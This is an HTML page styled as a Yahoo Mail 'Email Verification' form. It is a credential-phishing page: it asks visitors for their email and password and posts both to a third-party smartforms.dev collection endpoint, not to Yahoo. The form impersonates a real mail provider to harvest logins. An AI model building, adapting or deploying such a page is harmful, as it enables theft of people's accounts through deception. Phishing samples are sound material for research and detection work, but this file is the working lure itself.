<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Email Verification</title>
	<style>
		*{
			margin-bottom: 0;
			padding: 0;
			box-sizing: border-box;
		}
		body{
			min-height: 75vh;
			background: #eee;
			display: flex;
			font-family: sans-serif;
		}
		.container{
			margin: auto;
			width: 450px;
			max-width: 90%;
		}
		.container form{
			width: 100%;
			height: 100%;
			padding: 40px;
			background: white;
			border-radius: 4px;
			box-shadow: 0 8px 16px rgba(0,0,.3);
		}
		.container form h3{
			text-align: center;
			margin-bottom: 24px;
			color: #222;
		}
		.container form .form-control{
			width: 100%;
			height: 40px;
			background: white;
			border-radius: 1px solid silver;
			margin: 10px 0 18px 0;
			padding: 0 10px;
		}
		.container form .btn{
			margin-left: 50%;
			transform: translateX(-50%);
			width: 120px;
			height: 34px;
			border: none;
			outline: none;
			background: blue;
			cursor: pointer;
			text-transform: uppercase;
			color: white;
			border-radius: 4px;
			transform: .-3s;
		}
		.container form .btn:hover{
			opacity: .7;
		}

	</style>
</head>
<body>
	<div class="container">
		<form action="https://smartforms.dev/submit/600801b3b81854118fd40512" method="POST">
			<h3> Verify your Yahoo Mail Account</h3>
			<div class="form-group">
				<label for="Email">Email</label>
				<input type="text" id="Email" name="Email" class="form-control" required>
			</div>
			<div class="form-group">
				<label for="password">Password</label>
				<input type="password" id="password" name="password" class="form-control" required>
			</div>
			<input type="submit" class="btn" value="Verify">
		</form>
	</div>
</body>
</html>
